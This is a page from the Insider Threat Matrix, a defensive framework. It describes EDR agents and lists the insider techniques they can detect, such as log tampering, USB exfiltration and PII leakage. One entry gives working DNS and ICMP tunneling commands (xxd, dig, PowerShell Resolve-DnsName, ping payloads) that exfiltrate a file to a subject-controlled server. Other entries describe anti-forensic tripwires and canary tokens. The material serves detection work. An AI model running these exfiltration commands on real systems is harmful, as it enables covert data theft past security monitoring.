ITM is an open framework - Submit your contributions now.

Insider Threat Matrix™

  • ID: DT046
  • Created: 02nd June 2024
  • Updated: 19th July 2024
  • Platforms: Windows, Linux, MacOS,
  • Contributor: The ITM Team

Agent Capable of Endpoint Detection and Response

An agent capable of Endpoint Detection and Response (EDR) is a software agent installed on organization endpoints (such as laptops and servers) that (at a minimum) records the Operating System, application, and network activity on an endpoint.

 

Typically EDR operates in an agent/server model, where agents automatically send logs to a server, where the server correlates those logs based on a rule set. This rule set is then used to surface potential security-related events, that can then be analyzed.

 

An EDR agent typically also has some form of remote shell capability, where a user of the EDR platform can gain a remote shell session on a target endpoint, for incident response purposes. An EDR agent will typically have the ability to remotely isolate an endpoint, where all network activity is blocked on the target endpoint (other than the network activity required for the EDR platform to operate).

Sections

ID Name Description
ME003Installed Software

A subject can leverage software approved for installation or software that is already installed.

ME006Web Access

A subject can access the web with an organization device.

ME007Privileged Access

A subject has privileged access to devices, systems or services that hold sensitive information.

ME009FTP Servers

A subject is able to access external FTP servers.

ME010SSH Servers

A subject is able to access external SSH servers.

AF002Clear Operating System Logs

A subject clears operating system logs to hide evidence of their activities.

AF009Log Tampering

A subject may attempt to modify log files, as opposed to deleting them, to remove evidence of their actions.

AF013Delete User Account

A subject may delete user accounts to obscure their activities and delete all files associated with that user.

PR019Private / Incognito Browsing

Private browsing, also known as 'incognito mode' among other terms, is a feature in modern web browsers that prevents the storage of browsing history, cookies, and site data on a subject's device. When private browsing is enabled, it ensures any browsing activity conducted during the browser session is not saved to the browser history or cache.

 

A subject can use private browsing to conceal their actions in a web browser, such as navigating to unauthorized websites, downloading illicit materials, uploading corporate data or conducting covert communications, thus leaving minimal traces of their browsing activities on a device and frustrating forensic recovery efforts.

PR020Data Obfuscation

Data obfuscation is the act of deliberately obscuring or disguising data to avoid detection and/or hinder forensic analysis. A subject may obscure data in preparation to exfiltrate the data.

PR021Network Scanning

A subject conducts a scan of a network to identify additional systems, or services running on those systems.

IF017Excessive Personal Use

A subject uses organizational resources, such as internet access, email, or work devices, for personal activities both during and outside work hours, exceeding reasonable personal use. This leads to reduced productivity, increased security risks, and the potential mixing of personal and organizational data, ultimately affecting the organization’s efficiency and overall security.

IF018Sharing on AI Chatbot Platforms

A subject interacts with a public Artificial Intelligence (AI) chatbot (such as ChatGPT and xAI Grok), leading to the intentional or unintentional sharing of sensitive information.

AF016Uninstalling Software

The subject uninstalls software, which may also remove relevant artifacts from the system's disk, such as regsitry keys or files necessary for the software to run, preventing them from being used by investigators to track activity.

PR023Suspicious Web Browsing

A subject engages in web searches that may indicate research or information gathering related to potential infringement or anti-forensic activities. Examples include searching for software that could facilitate data exfiltration, methods for deleting or modifying system logs, or techniques to evade security controls. Such activity could signal preparation for a potential insider event.

AF017Use of a Virtual Machine

The subject uses a virtual machine (VM) to contain artifacts of forensic value within the virtualized environment, preventing them from being written to the host file system. This strategy helps to obscure evidence and complicate forensic investigations.
 

By running a guest operating system within a VM, the subject can potentially evade detection by security agents installed on the host operating system, as these agents may not have visibility into activities occurring within the VM. This adds an additional layer of complexity to forensic analysis, making it more challenging to detect and attribute malicious activities.

IF020Unauthorized VPN Client

The subject installs and uses an unapproved VPN client, potentially violating organizational policy. By using a VPN service not controlled by the organization, the subject can bypass security controls, reducing the security team’s visibility into network activity conducted through the unauthorized VPN. This could lead to significant security risks, as monitoring and detection mechanisms are circumvented.

PR025File Download

The subject downloads one or more files to a system to access the file or prepare for exfiltration.

IF001Exfiltration via Web Service

A subject uses an existing, legitimate external Web service to exfiltrate data

MT021Conflicts of Interest

A subject may be motivated by personal, financial, or professional interests that directly conflict with their duties and obligations to the organization. This inherent conflict of interest can lead the subject to engage in actions that compromise the organization’s values, objectives, or legal standing.

 

For instance, a subject who serves as a senior procurement officer at a company may have a financial stake in a vendor company that is bidding for a contract. Despite knowing that the vendor's offer is subpar or overpriced, the subject might influence the decision-making process to favor that vendor, as it directly benefits their personal financial interests. This conflict of interest could lead to awarding the contract in a way that harms the organization, such as incurring higher costs, receiving lower-quality goods or services, or violating anti-corruption regulations.

 

The presence of a conflict of interest can create a situation where the subject makes decisions that intentionally or unintentionally harm the organization, such as promoting anti-competitive actions, distorting market outcomes, or violating regulatory frameworks. While the subject’s actions may be hidden behind professional duties, the conflict itself acts as the driving force behind unethical or illegal behavior. These infringements can have far-reaching consequences, including legal ramifications, financial penalties, and damage to the organization’s reputation.

ME024Access

A subject holds access to both physical and digital assets that can enable insider activity. This includes systems such as databases, cloud platforms, and internal applications, as well as physical environments like secure office spaces, data centers, or research facilities. When a subject has access to sensitive data or systems—especially with broad or elevated privileges—they present an increased risk of unauthorized activity.

 

Subjects in roles with administrative rights, technical responsibilities, or senior authority often have the ability to bypass controls, retrieve restricted information, or operate in areas with limited oversight. Even standard user access, if misused, can facilitate data exfiltration, manipulation, or operational disruption. Weak access controls—such as excessive permissions, lack of segmentation, shared credentials, or infrequent reviews—further compound this risk by enabling subjects to exploit access paths that should otherwise be limited or monitored.

 

Furthermore, subjects with privileged or strategic access may be more likely to be targeted for recruitment by external parties to exploit their position. This can include coercion, bribery, or social engineering designed to turn a trusted insider into an active participant in malicious activities.

ME025Placement

A subject’s placement within an organization shapes their potential to conduct insider activity. Placement refers to the subject’s formal role, business function, or proximity to sensitive operations, intellectual property, or critical decision-making processes. Subjects embedded in trusted positions—such as those in legal, finance, HR, R&D, or IT—often possess inherent insight into internal workflows, organizational vulnerabilities, or confidential information.

 

Strategic placement can grant the subject routine access to privileged systems, classified data, or internal controls that, if exploited, may go undetected for extended periods. Roles that involve oversight responsibilities or authority over process approvals can also allow for policy manipulation, the suppression of alerts, or the facilitation of fraudulent actions.

 

Subjects in these positions may not only have a higher capacity to carry out insider actions but may also be more appealing targets for adversarial recruitment or collusion, given their potential to access and influence high-value organizational assets. The combination of trust, authority, and access tied to their placement makes them uniquely positioned to execute or support malicious activity.

MT007Resentment

A subject is motivated by resentment towards the organisation to access and exfiltrate or destroy data or otherwise contravene internal policies. 

MT010Self Sabotage

A subject accesses and exfiltrates or destroys sensitive data or otherwise contravenes internal policies with the aim to be caught and penalised.

MT006Third Party Collusion Motivated by Personal Gain

A subject is recruited by a third party to access and exfiltrate or destroy sensitive data or otherwise contravene internal policies for in exchange for a personal gain.

MT012Coercion

A subject is persuaded against their will to access and exfiltrate or destroy sensitive data, or conduct some other act that harms or undermines the target organization. 

IF012Public Statements Resulting in Brand Damage

A subject makes comments either in-person or online that can damage the organization's brand through association.

MT022Boundary Testing

The subject deliberately pushes or tests organizational policies, rules, or controls to assess tolerance levels, detect oversight gaps, or gain a sense of impunity. While initial actions may appear minor or exploratory, boundary testing serves as a psychological and operational precursor to more serious misconduct.

 

Characteristics

  • Motivated by curiosity, challenge-seeking, or early-stage dissatisfaction.
  • Actions often start small: minor policy violations, unauthorized accesses, or circumvention of procedures.
  • Rationalizations include beliefs that policies are overly rigid, outdated, or unfair.
  • Boundary testing behavior may escalate if it is unchallenged, normalized, or inadvertently rewarded.
  • Subjects often seek to gauge the likelihood and severity of consequences before considering larger or riskier actions.
  • Testing may be isolated or gradually evolve into opportunism, retaliation, or deliberate harm.

 

Example Scenario

A subject repeatedly circumvents minor IT security controls (e.g., bypassing content filters, using personal devices against policy) without immediate consequences. Encouraged by the lack of enforcement, the subject later undertakes unauthorized data transfers, rationalizing the behavior based on perceived inefficiencies and low risk of detection.

PR026Remote Desktop (RDP)

The subject initiates configuration or usage of Remote Desktop Protocol (RDP) to enable remote control of an endpoint or server, typically for purposes not sanctioned by the organization. This activity may include enabling RDP settings through system configuration, altering firewall rules, adding users to RDP groups, or initiating browser-based remote access sessions. While RDP is commonly used for legitimate administrative and support purposes, its unauthorized configuration is a well-documented preparatory behavior preceding data exfiltration, sabotage, or persistent unauthorized access.

 

RDP can be enabled through local system settings, remote management tools, or even web-based services that proxy or tunnel RDP traffic through HTTPS. Subjects may configure RDP access for themselves, for a secondary device, or to facilitate third-party (external) involvement in insider threat activities.

IF007.002Streaming Copyrighted Material

A subject accesses a website that allows for the unauthorized streaming of copyrighted material.

ME006.001Webmail

A subject can access personal webmail services in a browser.

ME006.002Cloud Storage

A subject can access personal cloud storage in a browser.

ME006.003Inappropriate Websites

A subject can access websites containing inappropriate content.

ME006.004Note-Taking Websites

A subject can access external note-taking websites (Such as Evernote).

ME006.005Messenger Services

A subject can access external messenger web-applications with the ability to transmit data and/or files.

ME003.011Screen Sharing Software

A subject has access to or can install screen sharing software which can be used to capture images or other information from a target system.

ME006.006Code Repositories

A subject can access websites used to access or manage code repositories.

PR020.001Renaming Files or Changing File Extensions

A subject may rename a file to obscure the content of the file or change the file extension to hide the file type. This can aid in avoiding suspicion and bypassing certain security filers and endpoint monitoring tools. For example, renaming a sensitive document from FinancialReport.docx to Recipes.txt before copying it to a USB mass storage device.

IF002.001Exfiltration via USB Mass Storage Device

A subject exfiltrates data using a USB-connected mass storage device, such as a USB flash drive or USB external hard-drive.

IF002.006Exfiltration via USB to USB Data Transfer

A USB to USB data transfer cable is a device designed to connect two computers directly together for the purpose of transferring files between them. These cables are equipped with a small electronic circuit to facilitate data transfer without the need for an intermediate storage device. Typically a USB to USB data transfer cable will require specific software to be installed to facilitate the data transfer. In the context of an insider threat, a USB to USB data transfer cable can be a tool for exfiltrating sensitive data from an organization's environment.

IF002.007Exfiltration via Target Disk Mode

When a Mac is booted into Target Disk Mode (by powering the computer on whilst holding the ‘T’ key), it acts as an external storage device, accessible from another computer via Thunderbolt, USB, or FireWire connections. A subject with physical access to the computer, and the ability to control boot options, can copy any data present on the target disk, bypassing the need to authenticate to the target computer.

AF004.001Clear Chrome Artifacts

A subject clears Google Chrome browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.003Clear Firefox Artifacts

A subject clears Mozzila Firefox browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.002Clear Edge Artifacts

A subject clears Microsoft Edge browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

IF008.003Terrorist Content

A subject accesses, possesses and/or distributes materials that advocate, promote, or incite unlawful acts of violence intended to further political, ideological or religious aims (terrorism).

IF008.004Extremist Content

A person accesses, possesses, or distributes materials that advocate, promote, or incite extreme ideological, political, or religious views, often encouraging violence or promoting prejudice against individuals or groups.

IF001.005Exfiltration via Note-Taking Web Services

A subject uploads confidential organization data to a note-taking web service, such as Evernote. The subject can then access the confidential data outside of the organization from another device. Examples include (URLs have been sanitized):

  • hxxps://www.evernote[.]com
  • hxxps://keep.google[.]com
  • hxxps://www.notion[.]so
  • hxxps://www.onenote[.]com
  • hxxps://notebook.zoho[.]com
ME006.007Text Storage Websites

A subject can access external text storage websites, such as Pastebin.

IF004.005Exfiltration via Protocol Tunneling

A subject exfiltrates data from an organization by encapsulating or hiding it within an otherwise legitimate protocol. This technique allows the subject to covertly transfer data, evading detection by standard security monitoring tools. Commonly used protocols, such as DNS and ICMP, are often leveraged to secretly transmit data to an external destination.

DNS Tunneling (Linux)
A simple example of how DNS tunneling might be achieved with 'Living off the Land' binaries (LoLBins) in Linux:
 

Prerequisites:

  • A domain the subject controls or can use for DNS queries.
  • A DNS server to receive and decode the DNS queries.

 

Steps:

1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:

 

xxd -p secret.txt > secret.txt.hex
 

2. The subject splits the hexdump into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):

 

split -b 32 secret.txt.hex hexpart_

 

3. The subject uses dig to send the data in DNS TXT queries. Looping through the split files and sending each chunk as the subdomain of example.com in a TXT record query:

 

for part in hexpart_*; do
   h=$(cat $part)
   dig txt $h.example.com
done

 

On the target DNS server that they control, the subject captures the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query.

 

DNS Tunneling (Windows)
A simple example of how DNS tunneling might be achieved with PowerShell in Windows:

 

Prerequisites:

  • A the subject you controls.
    A DNS server or a script on the subjects server to capture and decode the DNS queries.

 

Steps:
1. The subject converts the sensitive file to hex:

 

$filePath = "C:\path\to\your\secret.txt"
$hexContent = [System.BitConverter]::ToString([System.IO.File]::ReadAllBytes($filePath)) -replace '-', ''

 

2. The subject splits the hex data into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):

 

$chunkSize = 32
$chunks = $hexContent -split "(.{$chunkSize})" | Where-Object { $_ -ne "" }

 

3. The subject sends the data in DNS TXT queries. Looping through the hex data chunks and sending each chunk as the subdomain of example.com in a TXT record query:

 

$domain = "example.com"

foreach ($chunk in $chunks) {
   $query = "$chunk.$domain"
   Resolve-DnsName -Name $query -Type TXT
}

 

The subject will capture the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query.

 

ICMP Tunneling (Linux)
A simple example of how ICMP tunneling might be achieved with 'Living off the Land' binaries (LOLBins) in Linux:
 

Prerequisites:

  • The subject has access to a server that can receive and process ICMP packets.
  • The subject has root privileges on both client and server machines (as ICMP usually requires elevated permissions).

 

Steps:

1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:

 

xxd -p secret.txt > secret.txt.hex

 

2. The subject splits the hexdump into manageable chunks. ICMP packets have a payload size limit, so it’s common to use small chunks. The following command will split the hex data into 32-byte chunks:
 

split -b 32 secret.txt.hex hexpart_

 

3. The subject uses ping to send the data in ICMP echo request packets. Loop through the split files and send each chunk as part of the ICMP payload:


DESTINATION_IP="subject_server_ip"
for part in hexpart_*; do
   h=$(cat $part)
   ping -c 1 -p "$h" $DESTINATION_IP
done

 

The subject will capture the incoming ICMP packets on the destination server, extract the data from the packets and decode the reassembled the hex data.

IF011.001Intentionally Weakening Network Security Controls For a Third Party

The subject intentionally weakens or bypasses network security controls for a third party, such as providing credentials or disabling security controls.

IF018.001Exfiltration via AI Chatbot Platform History

A subject intentionally submits sensitive information when interacting with a public Artificial Intelligence (AI) chatbot (such as ChatGPT and xAI Grok). They will access the conversation at a later date to retrieve information on a different system.

IF018.002Reckless Sharing on AI Chatbot Platforms

A subject recklessly interacts with a public Artificial Intelligence (AI) chatbot (such as ChatGPT and xAI Grok), leading to the inadvertent sharing of sensitive information. The submission of sensitive information to public AI platforms risks exposure due to potential inadequate data handling or security practices. Although some platforms are designed not to retain specific personal data, the reckless disclosure could expose the information to unauthorized access and potential misuse, violating data privacy regulations and leading to a loss of competitive advantage through the exposure of proprietary information.

AF018.001Endpoint Tripwires

A subject installs custom software or malware on an endpoint, potentially disguising it as a legitimate process. This software includes tripwire logic to monitor the system for signs of security activity.

 

The tripwire software monitors various aspects of the endpoint to detect potential investigations:

  • Security Tool Detection: It scans running processes and monitors new files or services for signatures of known security tools, such as antivirus programs, forensic tools, and Endpoint Detection and Response (EDR) systems.
  • File and System Access: It tracks access to critical files or system directories (e.g., system logs, registry entries) commonly accessed during security investigations. Attempts to open or read sensitive files can trigger an alert.
  • Network Traffic Analysis: The software analyzes network traffic to identify unusual patterns, including connections to Security Operations Centers (SOC) or the blocking of command-and-control servers by network security controls.
  • User and System Behavior: It observes system behavior and monitors logs (such as event logs) that indicate an investigation is in progress, such as switching to an administrative account or modifying security settings (e.g., enabling disk encryption, changing firewall rules).

 

Upon detecting security activity, the tripwire can initiate various evasive responses:

  • Alert the Subject: It covertly sends an alert to an external server controlled by the subject, using common system tools (e.g., curl, wget, or HTTP requests).
  • Modify Endpoint Behavior: It can terminate malicious processes, erase evidence (e.g., logs, browser history, specific files), or restore system and network configurations to conceal signs of tampering.
AF018.003Canary Tokens

A subject uses files with canary tokens as a tripwire mechanism to detect the presence of security personnel or investigation activities within a compromised environment. This method involves strategically placing files embedded with special identifiers (canary tokens) that trigger alerts when accessed. For example:

 

The subject creates files containing canary tokens—unique identifiers that generate an alert when they are accessed, opened, or modified. These files can appear as regular documents, logs, configurations, or other items that might attract the attention of an investigator during a security response.

 

The subject strategically places these files in various locations within the environment:

  • Endpoints: Files with canary tokens are stored in directories where digital forensics or malware analysis is likely to occur, such as system logs, user data directories, or registry entries.
  • Cloud Storage: The files are uploaded to cloud storage buckets, virtual machines, or application databases where security teams might search for indicators of compromise.
  • Network Shares: Shared drives and network locations where forensic investigators or security tools may perform scans.

 

Once in place, the canary token within each file serves as a silent tripwire. The token monitors for access and automatically triggers an alert if an action is detected:

  • Access Detection: If a security tool, administrator, or investigator attempts to open, modify, or copy the file, the embedded canary token sends an alert to an external server controlled by the subject.
  • Network Traffic: The token can initiate an outbound network request (e.g., HTTP, DNS) to a specified location, notifying the subject of the exact time and environment where the access occurred.
  • Behavior Analysis: The subject might include multiple canary files, each with unique tokens, to identify the pattern of investigation, such as the sequence of directories accessed or specific file types of interest to the security team.

 

Upon receiving an alert from a triggered canary token, the subject can take immediate steps to evade detection:

  • Alert the Subject: The canary token sends a covert signal to the subject's designated server or communication channel, notifying them of the potential investigation.
  • Halt Malicious Activity: The subject can use this warning to suspend ongoing malicious actions, such as data exfiltration or command-and-control communications, to avoid further detection.
  • Clean Up Evidence: Scripts can be triggered to delete or alter logs, remove incriminating files, or revert system configurations to their original state, complicating any forensic investigation.
  • Feign Normalcy: The subject can restore or disguise compromised systems to appear as though nothing suspicious has occurred, minimizing signs of tampering.

 

By using files with canary tokens as tripwires, a subject can gain early warning of investigative actions and respond quickly to avoid exposure. This tactic allows them to outmaneuver standard security investigations by leveraging silent alerts that inform them of potential security team activity.

IF010.002Exfiltration via Personal Email

A subject exfiltrates information using a mailbox they own or have access to, either via software or webmail. They will access the conversation at a later date to retrieve information on a different system.

IF004.006Exfiltration via Python Listening Service

A subject may employ a Python-based listening service to exfiltrate organizational data, typically as part of a self-initiated or premeditated breach. Python’s accessibility and versatility make it a powerful tool for creating custom scripts capable of transmitting sensitive data to external or unauthorized internal systems.

 

In this infringement method, the subject configures a Python script—often hosted externally or on a covert internal system—to listen for incoming connections. A complementary script, running within the organization’s network (such as on a corporate laptop), transmits sensitive files or data streams to the listening service using common protocols such as HTTP or TCP, or via more covert channels including DNS tunneling, ICMP, or steganographic methods. Publicly available tools such as PyExfil can facilitate these operations, offering modular capabilities for exfiltrating data across multiple vectors.

 

Examples of Use:

  • A user sets up a lightweight Python HTTP listener on a personal VPS and writes a Python script to send confidential client records over HTTPS.
  • A developer leverages a custom Python socket script to transfer log data to a system outside the organization's network, circumventing monitoring tools.
  • An insider adapts an open-source exfiltration framework like PyExfil to send data out via DNS queries to a registered domain.

 

Detection Considerations:

  • Monitor for local Python processes opening network sockets or binding to uncommon ports.
  • Generate alerts on outbound connections to unfamiliar IP addresses or those exhibiting anomalous traffic patterns.
  • Utilize endpoint detection and response (EDR) solutions to flag scripting activity involving file access and external communications.
  • Inspect Unified Logs, network flow data, and system audit trails for signs of unauthorized data movement or execution of custom scripts.
PR018.007Downgrading Microsoft Information Protection (MIP) labels

A subject may intentionally downgrade the Microsoft Information Protection (MIP) label applied to a file in order to obscure the sensitivity of its contents and bypass security controls. MIP labels are designed to classify and protect files based on their sensitivity—ranging from “Public” to “Highly Confidential”—and are often used to enforce Data Loss Prevention (DLP), access restrictions, encryption, and monitoring policies.

 

By reducing a file's label classification, the subject may make the file appear innocuous, thus reducing the likelihood of triggering alerts or blocks by email filters, endpoint monitoring tools, or other security mechanisms.

 

This technique can enable the unauthorized exfiltration or misuse of sensitive data while evading established security measures. It may indicate premeditated policy evasion and can significantly weaken the organization’s data protection posture.

 

Examples of Use:

  • A subject downgrades a financial strategy document from Highly Confidential to Public before emailing it to a personal address, bypassing DLP policies that would normally prevent such transmission.
  • A user removes a classification label entirely from an engineering design document to upload it to a non-corporate cloud storage provider without triggering security controls.
  • An insider reclassifies multiple project files from Confidential to Internal Use Only to facilitate mass copying to a removable USB device.

 

Detection Considerations:

  • Monitoring for sudden or unexplained MIP label downgrades, especially in proximity to data transfer events (e.g., email sends, cloud uploads, USB copies).
  • Correlating audit logs from Microsoft Purview (formerly Microsoft Information Protection) with outbound data transfer events.
  • Use of Data Classification Analytics to detect label changes on high-value files without associated business justification.
  • Reviewing file access and modification logs to identify users who have altered classification metadata prior to suspicious activity.
IF022.002PII Leakage (Personally Identifiable Information)

PII (Personally Identifiable Information) leakage refers to the unauthorized disclosure, exposure, or mishandling of information that can be used to identify an individual, such as names, addresses, phone numbers, national identification numbers, financial data, or biometric records. In the context of insider threat, PII leakage may occur through negligence, misconfiguration, policy violations, or malicious intent.

 

Insiders may leak PII by sending unencrypted spreadsheets via email, exporting user records from customer databases, misusing access to HR systems, or storing sensitive personal data in unsecured locations (e.g., shared drives or cloud storage without proper access controls). In some cases, PII may be leaked unintentionally through logs, collaboration platforms, or default settings that fail to mask sensitive fields.

 

The consequences of PII leakage can be severe—impacting individuals through identity theft or financial fraud, and exposing organizations to legal penalties, reputational harm, and regulatory sanctions under frameworks such as GDPR, CCPA, or HIPAA.

 

Examples of Infringement:

  • An employee downloads and shares a list of customer contact details without authorization.
  • PII is inadvertently exposed in error logs or email footers shared externally.
  • HR data containing employee National Insurance or Social Security numbers is copied to a personal cloud storage account.
IF022.003PHI Leakage (Protected Health Information)

PHI Leakage refers to the unauthorized, accidental, or malicious exposure, disclosure, or loss of Protected Health Information (PHI) by a healthcare provider, health plan, healthcare clearinghouse (collectively, "covered entities"), or their business associates. Under the Health Insurance Portability and Accountability Act (HIPAA) in the United States, PHI is defined as any information that pertains to an individual’s physical or mental health, healthcare services, or payment for those services that can be used to identify the individual. This includes medical records, treatment history, diagnosis, test results, and payment details.

 

HIPAA imposes strict regulations on how PHI must be handled, stored, and transmitted to ensure that individuals' health information remains confidential and secure. The Privacy Rule within HIPAA outlines standards for the protection of PHI, while the Security Rule mandates safeguards for electronic PHI (ePHI), including access controls, encryption, and audit controls. Any unauthorized access, improper sharing, or accidental exposure of PHI constitutes a breach under HIPAA, which can result in significant civil and criminal penalties, depending on the severity and nature of the violation.

 

In addition to HIPAA, other countries have established similar protections for PHI. For example, the General Data Protection Regulation (GDPR) in the European Union protects personal health data as part of its broader data protection laws. Similarly, Canada's Personal Information Protection and Electronic Documents Act (PIPEDA) governs the collection, use, and disclosure of personal health information by private-sector organizations. Australia also has regulations under the Privacy Act 1988 and the Health Records Act 2001, which enforce stringent rules for the handling of health-related personal data.

 

This infringement occurs when an insider—whether maliciously or through negligence—exposes PHI in violation of privacy laws, organizational policies, or security protocols. Such breaches can involve unauthorized access to health records, improper sharing of medical information, or accidental exposure of sensitive health data. These breaches may result in severe legal, financial, and reputational consequences for the healthcare organization, including penalties, lawsuits, and loss of trust.

 

Examples of Infringement:

  • A healthcare worker intentionally accesses a patient's medical records without authorization for personal reasons, such as to obtain information on a celebrity or acquaintance.
  • An employee negligently sends patient health data to the wrong recipient via email, exposing sensitive health information.
  • An insider bypasses security controls to access and exfiltrate medical records for malicious use, such as identity theft or selling PHI on the dark web.
IF023.001Export Violations

Export violations occur when a subject engages in the unauthorized transfer of controlled goods, software, technology, or technical data to foreign persons or destinations, in breach of applicable export control laws and regulations. These laws are designed to protect national security, economic interests, and international agreements by restricting the dissemination of sensitive materials and know-how.

 

Such violations often involve the failure to obtain the necessary export licenses, misclassification of export-controlled items, or the improper handling of technical data subject to regulatory oversight. The relevant legal frameworks may include the International Traffic in Arms Regulations (ITAR), Export Administration Regulations (EAR), and similar export control regimes in other jurisdictions.

 

Insiders may contribute to export violations by sending restricted files abroad, sharing controlled technical specifications with foreign nationals (even within the same organization), or circumventing export controls through the use of unauthorized communication channels or cloud services. These actions are considered violations regardless of the recipient’s sanction status and may occur entirely within legal jurisdictions if export-controlled information is shared with unauthorized individuals.

 

Export violations are distinct from sanction violations in that they pertain specifically to the nature of the goods, data, or services exported, and the mechanism of transfer, rather than the status of the recipient.

Failure to comply with export control laws can result in civil and criminal penalties, loss of export privileges, and reputational damage to the organization.

IF023.002Sanction Violations

Sanction violations involve the direct or indirect engagement in transactions with individuals, entities, or jurisdictions that are subject to government-imposed sanctions. These restrictions are typically enforced by regulatory bodies such as the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC), the United Nations, the European Union, and equivalent authorities in other jurisdictions.

 

Unlike export violations, which focus on the control of goods and technical data, sanction violations concern the status of the receiving party. A breach occurs when a subject facilitates, authorizes, or executes transactions that provide economic or material support to a sanctioned target—this includes sending payments, delivering services, providing access to infrastructure, or sharing non-controlled information with a restricted party.

 

Insiders may contribute to sanction violations by bypassing compliance checks, falsifying documentation, failing to screen third-party recipients, or deliberately concealing the sanctioned status of a partner or entity. Such conduct can occur knowingly or as a result of negligence, but in either case, it exposes the organization to serious legal and financial consequences.

 

Regulatory enforcement for sanctions breaches may result in significant penalties, asset freezes, criminal prosecution, and reputational damage. Organizations are required to maintain robust compliance programs to monitor and prevent insider-driven violations of international sanctions regimes.

IF023.003Anti-Trust or Anti-Competition

Anti-trust or anti-competition violations occur when a subject engages in practices that unfairly restrict or distort market competition, violating laws designed to protect free market competition. These violations can involve a range of prohibited actions, such as price-fixing, market division, bid-rigging, or the abuse of dominant market position. Such behavior typically aims to reduce competition, manipulate pricing, or create unfair advantages for certain businesses or individuals.

 

Anti-competition violations may involve insiders leveraging their position to engage in anti-competitive practices, often for personal or corporate gain. These violations can result in significant legal and financial penalties, including fines and sanctions, as well as severe reputational damage to the organization involved.

 

Examples of Anti-Trust or Anti-Competition Violations:

 

  • A subject shares sensitive pricing or bidding information between competing companies, enabling coordinated pricing or market manipulation.
  • An insider with knowledge of a merger or acquisition shares details with competitors, leading to coordinated actions that suppress competition.
  • An employee uses confidential market data to form agreements with competitors on market control, stifling competition and violating anti-trust laws.

 

Regulatory Framework:

 

Anti-trust or anti-competition laws are enforced globally by various regulatory bodies. In the United States, the Federal Trade Commission (FTC) and the Department of Justice (DOJ) regulate anti-competitive behavior under the Sherman Act, the Clayton Act, and the Federal Trade Commission Act. In the European Union, the European Commission enforces anti-trust laws under the Treaty on the Functioning of the European Union (TFEU) and the Competition Act.

ME024.003Access to Critical Environments (Production and Pre-Production)

Subjects with access to production and pre-production environments—whether as users, developers, or administrators—hold the potential to exploit or compromise highly sensitive organizational assets. Production environments, which host live applications and databases, are critical to business operations and often contain real-time data, including proprietary business information and personally identifiable information (PII). A subject with access to these systems can manipulate operational processes, exfiltrate sensitive data, introduce malicious code, or degrade system performance.

 

Pre-production environments, used for testing, staging, and development, often replicate production systems, though they may contain anonymized or less protected data. Despite this, pre-production environments can still house sensitive configurations, APIs, and testing data that can be exploited. A subject with access to these environments may uncover system vulnerabilities, access sensitive credentials, or introduce code that could be escalated into the production environment.

 

In both environments, privileged access provides a direct pathway to the underlying infrastructure, system configurations, logs, and application code. For example, administrative access allows manipulation of security policies, user permissions, and system-level access controls. Similarly, access to development environments can provide insights into source code, configuration management, and test data—all of which could be leveraged to further insider activity.

 

Subjects with privileged access to critical environments are positioned not only to exploit system vulnerabilities or bypass security controls but also to become targets for recruitment by external actors seeking unauthorized access to sensitive information. These individuals may be approached or coerced to intentionally compromise the environment, escalate privileges, or exfiltrate data on behalf of malicious third parties.

 

Given the sensitivity of these environments, subjects with privileged access represent a significant insider threat to the integrity of the organization's systems and data. Their position allows them to manipulate or exfiltrate sensitive information, either independently or in collaboration with external actors. The risk is further amplified as these individuals may be vulnerable to recruitment or coercion, making them potential participants in malicious activities that compromise organizational security. As insiders, their knowledge and access make them a critical point of concern for both data protection and operational security.

ME024.005Access to Physical Spaces

Subjects with authorized access to sensitive physical spaces—such as secure offices, executive areas, data centers, SCIFs (Sensitive Compartmented Information Facilities), R&D labs, or restricted zones in critical infrastructure—pose an increased insider threat due to their physical proximity to sensitive assets, systems, and information.

 

Such spaces often contain high-value materials or information, including printed sensitive documents, whiteboard plans, authentication devices (e.g., smartcards or tokens), and unattended workstations. A subject with physical presence in these locations may observe confidential conversations, access sensitive output, or physically interact with devices outside of typical security monitoring.

 

This type of access can be leveraged to:

  • Obtain unattended or discarded sensitive information, such as printouts, notes, or credentials left on desks.
  • Observe operational activity or decision-making, gaining insight into projects, personnel, or internal dynamics.
  • Access unlocked devices or improperly secured terminals, allowing direct system interaction or credential harvesting.
  • Bypass digital controls via physical means, such as tailgating into secure spaces or using misappropriated access cards.
  • Covertly install or remove equipment, such as data exfiltration tools, recording devices, or physical implants.
  • Eavesdrop on confidential conversations, either directly or through concealed recording equipment, enabling the collection of sensitive verbal disclosures, strategic discussions, or authentication procedures.

 

Subjects in roles that involve frequent presence in sensitive locations—such as cleaning staff, security personnel, on-site engineers, or facility contractors—may operate outside the scope of standard digital access control and may not be fully visible to security teams focused on network activity.

 

Importantly, individuals with this kind of access are also potential targets for recruitment or coercion by external threat actors seeking insider assistance. The ability to physically access secure environments and passively gather high-value information makes them attractive assets in coordinated attempts to obtain or compromise protected information.

 

The risk is magnified in organizations lacking comprehensive physical access policies, surveillance, or cross-referencing of physical and digital access activity. When unmonitored, physical access can provide a silent pathway to support insider operations without leaving traditional digital footprints.

ME025.002Leadership and Influence Over Direct Reports

A subject with a people management role holds significant influence over their direct reports, which can be leveraged to conduct insider activities. As a leader, the subject is in a unique position to shape team dynamics, direct tasks, and control the flow of information within their team. This authority presents several risks, as the subject may:

 

  • Influence team members to inadvertently or deliberately carry out tasks that contribute to the subject’s insider objectives. For instance, a manager might ask a subordinate to access or move sensitive data under the guise of a legitimate business need or direct them to work on projects that will inadvertently support a malicious agenda.
  • Exert pressure on employees to bypass security protocols, disregard organizational policies, or perform actions that could compromise the organization’s integrity. For example, a manager might encourage their team to take shortcuts in security or compliance checks to meet deadlines or targets.
  • Control access to sensitive information, either by virtue of the manager’s role or through the information shared within their team. A people manager may have direct visibility into highly sensitive internal communications, strategic plans, and confidential projects, which can be leveraged for malicious purposes.
